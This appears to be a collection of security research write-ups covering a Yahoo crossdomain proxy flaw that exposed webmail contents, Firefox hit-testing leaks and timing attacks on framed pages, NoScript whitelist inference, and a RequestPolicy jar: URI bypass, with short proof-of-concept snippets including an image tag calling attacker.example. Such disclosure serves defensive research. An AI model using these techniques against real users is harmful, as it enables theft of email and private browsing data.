Crossdomain proxies are generally goldmines for vulnerabilities, and this one's no different. First of all, it doesn't whitelist the URLs that we may make requests to, and the proxy is positioned inside Yahoo's internal network, so we can have it proxy out resources that would normally be inaccessible. I tested with a .corp.yahoo.com URL I found on Google, and ended up with some uninteresting, but normally inaccessible, search statistics. Other SSRF attacks were likely possible, but I didn't poke it much beyond verifying that local file disclosure wasn't possible.
Second, since the proxy doesn’t set a Content-Type
on the response and we control the response body, we’ve got XSS on hk.promotions.yahoo.com
thanks to type sniffing!
That’s nice and all, but XSS on a mostly-static subdomain isn’t that interesting to me. Now, remember that we control the entire body of the proxy’s response and that there’s no Content-Type
. That means we can also proxy an SWF and have it be same-origin with hk.promotions.yahoo.com
. Why’s a SWF any more useful to us than HTML? Because of overly-permissive crossdomain.xml rules.
Flash checks for a <destination domain>/crossdomain.xml
file before attempting a crossorigin request, to see if SWFs from the sender’s origin may read the response (among other things, see “Further Reading”.) For example, if you wanted to allow SWFs on any subdomain of yahoo.com
to do crossdomain reads to your domain, you might put a rule like this in your crossdomain.xml
:
```xml
<allow-access-from domain="*.yahoo.com" />
```
That's probably overly permissive; *.yahoo.com is a lot of attack surface. But let's take a look at what Yahoo actually has in their crossdomain.xml files.
ca-mg5.mail.yahoo.com (webmail server, returns valid crossdomain.xml
when logged in):
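The policy file itself isn't preserved in this copy; reconstructed from the description of its rules (not the verbatim file), it looked something like:

```xml
<?xml version="1.0"?>
<cross-domain-policy>
  <allow-access-from domain="*.yahoo.com" secure="false" />
</cross-domain-policy>
```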
YMail actually has the least secure crossdomain policy of any of the subdomains that I checked. That secure="false"
will allow SWFs served over HTTP to read resources only served over HTTPS, making the forced HTTPS a lot less useful. Per Adobe, “Using false in an HTTPS policy file is not recommended because this compromises the security offered by HTTPS.”
Well, now we know we can get an arbitrary SWF same-origin with a subdomain of yahoo.com, and we know that SWF can read from a number of subdomains on yahoo.com, so let's get some emails!
First, we need to pick the SWF to proxy. The obvious choice for someone who doesn’t know Flash well is a SWF<->JS XHR proxy. These allow you to proxy requests from JS through a specialized SWF. Here was the result, with some overzealous redaction:
Looks like our proxied proxy works: the response body includes all of my test account's auth tokens and personal info. One of those tokens allows us to access a JSON endpoint that lists our emails:
and we can use those message IDs to pull up specific emails from the user’s inbox:
and since we can read pages containing CSRF tokens, we can delete the user’s emails, send emails as the current user, etc:
Funky. The most obvious application of this attack would be to determine the user’s email, initiate a password reset on any “interesting” sites, read the password reset URL from their email, then delete the email; but there’s plenty of others.
Well, the affected page was for a Hongkongese pet show that happened in 2011, so the fix was removing the page and its associated crossdomain proxy. I’m disappointed that the crossdomain.xml
rules are still as loose as they are, but I don’t think that’s getting changed anytime soon. Subsequent reports mentioning the crossdomain.xml
rules have been marked WONTFIX.
There were SSRF and crossdomain data leakage issues due to a misconfigured crossdomain proxy and overly-permissive crossdomain.xml
rules. One was able to leak the emails of the current user, and do anything the user could do from YMail just by having them visit an attacker-controlled page.
This instance of the issue is fixed, but the crossdomain.xml
rules are still overly-permissive.
These next bugs were in Firefox's document.elementFromPoint and document.caretPositionFromPoint implementations.
I was looking at ways to automatically exploit another bug that required user interaction when I noticed elementFromPoint and caretPositionFromPoint on the MDN. Curious as to how they behaved with frames, I did a little testing.
I made an example page to test:
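The test page's markup is lost in this copy, but it was essentially just a document framing a cross-origin site; a minimal reconstruction (the dimensions are invented, cbc.ca is the framed site mentioned below):

```html
<!-- Minimal reconstruction: a page that frames a cross-origin document -->
<iframe src="http://www.cbc.ca/" width="400" height="400"></iframe>
```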
elementFromPoint(x,y)
behaved exactly as I expected, when used in the web console it returned the iframe on my page:
caretPositionFromPoint(x,y)
, however, was returning elements from the page on cbc.ca!
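The original console output is lost here; an illustrative transcript of the two calls (coordinates arbitrary):

```javascript
document.elementFromPoint(100, 100);
// returns the <iframe> element from my own document, as expected

document.caretPositionFromPoint(100, 100);
// returns a CaretPosition whose offsetNode is an element from the
// framed cbc.ca document
```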
But there was a small snag: I couldn’t actually access the CaretPosition
’s offsetNode
from JS without getting a security exception.
It seems that Firefox noticed that offsetNode
was being set to an element from a cross-origin document, and wrapped the CaretPosition
object
so that I couldn’t access any of its members from my document. Great.
However, I found I could access offsetNode
when it was set to null. offsetNode
seems to be set to null when the topmost
element at a given point is a button, and that includes scrollbar thumbs. That’s great for us, because knowing the size and location of the frame’s scrollbar thumb
tells us how large the framed document is, and also allows us to leak which elements exist on the page.
For example here’s what we can infer about https://tomcat.apache.org/tomcat-5.5-doc/ssl-howto.html#Create_a_local_Certificate_Signing_Request_(CSR) through its scrollbars:
The vertical scrollbar thumb has obviously moved, so we know that an element with an id of Create_a_local_Certificate_Signing_Request_(CSR)
exists in the framed document.
The following function is used to test offsetNode
accessibility at a given point in the document:
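The original function is lost in this copy; a sketch of the probe logic (the lookup function is a parameter here so the logic can be exercised outside a browser — on the attack page it would be `(x, y) => document.caretPositionFromPoint(x, y)`):

```javascript
// Sketch of the probe (a reconstruction, not the original code):
// returns true when offsetNode at (x, y) is readable, i.e. null because the
// topmost thing there is a button or scrollbar thumb, and false when reading
// it throws the cross-origin security exception.
function offsetNodeAccessible(caretPositionFromPoint, x, y) {
  const pos = caretPositionFromPoint(x, y);
  if (!pos) return false;
  try {
    return pos.offsetNode === null;
  } catch (e) {
    return false; // security exception: cross-origin content under the point
  }
}

// Simulated lookups for illustration:
const overScrollbarThumb = () => ({ offsetNode: null });
const overCrossOriginText = () => ({
  get offsetNode() { throw new Error('SecurityError'); },
});

console.log(offsetNodeAccessible(overScrollbarThumb, 10, 10));  // true
console.log(offsetNodeAccessible(overCrossOriginText, 50, 50)); // false
```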
Knowing the page’s size and whether certain elements are present is nice, but I wanted more. I remembered Paul Stone’s excellent paper about timing attacks on browser renderers and figured a timing attack might help us here.
caretPositionFromPoint
has to do hit testing on the document to determine what the topmost element is at a given point,
and I figured that’s not likely to be a constant time operation. It was also clear that hit testing was being performed on cross-origin frame contents, since caretPositionFromPoint
was returning elements from them.
I guessed that the time it took for a caretPositionFromPoint(x,y)
call to return would leak information about the element at (x,y)
.
To test my theory I made a script that runs caretPositionFromPoint(x,y)
on a given point 50 times, then stores the median time that the call took to complete. Using the median is important so we can eliminate timing differences due to unrelated factors, like CPU load at the time of the call.
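The original script is lost in this copy; a sketch of the measurement loop (the probe is a parameter so the logic runs outside a browser — in the attack it would wrap `document.caretPositionFromPoint(x, y)`):

```javascript
// Sketch of the timing loop (a reconstruction, not the original script):
// probe one point many times and keep the median duration, which suppresses
// outliers caused by unrelated CPU load or GC pauses.
function medianTime(probe, samples) {
  const times = [];
  for (let i = 0; i < samples; i++) {
    const start = performance.now();
    probe();
    times.push(performance.now() - start);
  }
  times.sort((a, b) => a - b);
  return times[Math.floor(times.length / 2)];
}

// Usage sketch: scan a grid of points over the iframe.
// for (let x = 0; x < w; x += 4)
//   for (let y = 0; y < h; y += 4)
//     grid[[x, y]] = medianTime(() => document.caretPositionFromPoint(x, y), 50);
```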
Once we’ve gathered timing measurements for all of the points across the iframe, we can make a visualization of the differences:
Neat.
You can see a number of things in the timing data: the bounding boxes of individual elements, how the lines of text wrap, the position of the bullets in the list, etc.
It also seems that even though elementFromPoint
doesn’t return elements from the framed document, it still descends into it for its hit testing, so it’s vulnerable to
the same timing attack as caretPositionFromPoint
.
So we can infer quite a bit about the framed document from the timing information, but can we actually steal text from it? Maybe, with a lot of work, depending on the page’s styling.
I’d hoped that caretPositionFromPoint
’s real purpose (determining what character index the caret should be at for a given point) would yield large enough timing differences to leak the width of individual characters, but that didn’t seem to be the case.
Since we can tell how wide a line of text is, we can extract text using a similar method to sirdarckcat's. First we measure how long the line is, then we make the iframe narrower to force the text to wrap, then we subtract the new width of the line from the old width, giving us the width of the word that just wrapped.
Since most sites use variable-width fonts ("O" and "i" have different widths on this blog, for example,) many small words have distinct widths that make them easy to pick out. With longer words there may be a number of valid words of that width, but an attacker may be able to determine which word fits best from the context of the surrounding words.
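The matching step can be sketched like this (the per-character widths are invented for illustration; real widths would be measured from the target's font):

```javascript
// The width of the word that wrapped is the old line width minus the new one.
function wrappedWordWidth(oldLineWidth, newLineWidth) {
  return oldLineWidth - newLineWidth;
}

// Hypothetical per-character widths for some variable-width font:
const charWidths = { i: 4, l: 4, O: 10, o: 8, n: 8, t: 5, h: 8, e: 7 };
const wordWidth = word => [...word].reduce((w, c) => w + (charWidths[c] || 7), 0);

// Candidate words whose total widths match the leaked measurement:
function candidates(words, leakedWidth) {
  return words.filter(w => wordWidth(w) === leakedWidth);
}

console.log(candidates(['in', 'on', 'the'], wrappedWordWidth(100, 100 - wordWidth('on'))));
// → [ 'on' ]
```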
Note that since we need to force text wrapping to get these measurements, it's harder to steal text from fixed-width pages, or pages that display a horizontal scrollbar instead of wrapping text (like view-source: URIs.) Pages that use fixed-width fonts are also more difficult to analyze because characters do not have distinct widths; we can only determine the number of characters in a word.
Note that the last Firefox version these actually work in is 26; if you want to try them out, you'll have to find a download for it.
Judging from Robert O’Callahan’s fix, it looks like Firefox was using a general hit testing function that descended cross-document for both elementFromPoint
and caretPositionFromPoint
. The fix was to disable cross-document descent in the hit testing function when called by either elementFromPoint
or caretPositionFromPoint
.
- caretPositionFromPoint leaked info through offsetNode accessibility
- Timing attack on elementFromPoint and caretPositionFromPoint
Most of the pertinent info is in the previous paper, but I’ll give a brief summary. By default NoScript operates in whitelist mode, forbidding scripts from all domains. Once a site has been added to the whitelist, scripts from that domain as well as those included from other whitelisted domains may be executed on the page.
NoScript’s default whitelist is fairly small, and users don’t generally share sets of whitelist rules (like with Adblock Plus,) so if a site is whitelisted the user must have used or visited that site.
Since the only whitelist is a global one (allowing scripts to run on facebook.com also allows other whitelisted domains to execute scripts from facebook.com,) whitelisted sites may infer what other sites are on the whitelist by including scripts from other domains and checking whether or not they execute.
The method described in the paper involves finding a valid script file on the domain you want to test and observing its side effects (modifications to the window
object or the DOM.) This can be tedious for an attacker, and requires a bit of manual work. It may also pollute the DOM / window
object with junk and break our testing code!
Luckily, there’s an easier way. Mike Cardwell describes a method of determining if a cross-origin resource returned a 200 status code using <script>
tags. The <script>
tag’s onload
handler will trigger on a successful HTTP status code, and the onerror
handler will trigger otherwise. The <script>
tag’s onload
handler will trigger even if the resource isn’t a valid script.
The same method may be used to determine if NoScript has blocked a resource that would normally return a 200 HTTP status code. http://domain.tld/
usually returns HTML with a 200 status code, so that’s a pretty good candidate for testing.
For example:
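The original snippet isn't preserved in this copy; a reconstruction with illustrative handlers:

```html
<script src="https://www.google.com/"
        onload="alert('google loaded!')"
        onerror="alert('google failed')"></script>
```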
If you have google.com whitelisted, this will say “google loaded!”. Otherwise (or if google.com is down for some reason) this will print “google failed”.
Here’s an example of how the attack may be used, including a timing attack based on the RequestPolicy bypass described in my last post. Mind, the timing attack is a bit spotty, and generally doesn’t work on the first page load. Refresh the page if it doesn’t work the first time.
If you don’t have either RequestPolicy or NoScript installed, here’s what you should see:
Global whitelist entries by their very nature leak info to any other site on the whitelist. This won’t be fixed in NoScript until support for per-site whitelists is added and people are encouraged to remove their old global rules.
In the meantime, using a patched RequestPolicy will give you a per-site whitelist for all cross-domain requests, effectively mitigating the issue.
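The original snippet is lost in this copy; the trigger was a single image tag pointing at a jar: URI, something along these lines (the attacker URL is illustrative):

```html
<img src="jar:http://attacker.example/archive.jar!/image.png">
```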
Firefox will block the resource from being displayed even if it is valid (due to prior security issues with the jar URI scheme,) but a cross-domain request is made and it doesn’t require JS to execute. This can be verified through the network pane in Firefox’s dev tools. A limited amount of information may be sent back from the server by using timing information.
Requests to jar URIs don’t get processed by RequestPolicy because aContentLocation’s asciiHost is undefined when the jar URI scheme is used, and it gets treated as an internal request. Since all internal requests are implicitly allowed, the request goes through.
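The flawed decision logic, as described above, can be sketched like this (not RequestPolicy's verbatim source; the function and whitelist parameter are invented for the example):

```javascript
// Sketch of the misclassification (a reconstruction of the logic described,
// not RequestPolicy's actual code): jar: URIs leave asciiHost undefined, so
// the request is treated as internal, and internal requests are implicitly
// allowed regardless of the whitelist.
function shouldAllowRequest(aContentLocation, whitelist) {
  if (aContentLocation.asciiHost === undefined) return true; // "internal"
  return whitelist.includes(aContentLocation.asciiHost);
}

console.log(shouldAllowRequest({ asciiHost: 'attacker.example' }, [])); // false
console.log(shouldAllowRequest({ scheme: 'jar' }, []));                 // true
```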
I emailed Justin the patch a few months ago, but he hasn’t responded. Hopefully this gets fixed on the addons.mozilla.org version soon, since it limits RequestPolicy’s effectiveness at preventing data exfiltration.
For now, you can use my fork of RequestPolicy. I'm not sure if the patch has any interactions with extensions, but it should also fix issues with nested use of the view-source scheme (which for some reason doesn't implement nsINestedURI).
If you’d like to see whether or not you’re vulnerable, I’ve made a Proof-of-Concept that detects whether or not RequestPolicy blocked an image from a jar URI.
Without the patch:
With the patch: